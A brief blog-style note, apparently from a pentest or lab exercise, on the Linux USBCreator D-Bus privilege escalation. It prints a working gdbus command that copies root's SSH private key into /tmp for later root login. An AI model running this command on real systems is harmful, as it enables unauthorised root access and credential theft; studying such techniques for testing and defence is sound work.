Hi ..
Another post-exploitation that is very easy to be executed is using Linux USBCreator. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root – without supplying a password
When I do the post-exploitation enumeration with linpeas.sh, I found that this host is vulnerable to the USBCreator D-Bus privilege escalation as shown below

So, when you have compromise the local machine with lower user privilege then basically you can run command below
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
With the above gdbus command we can copy the ssh private key from /root/.sshd/ to be copied to /tmp which later we can use the private key to do the SSH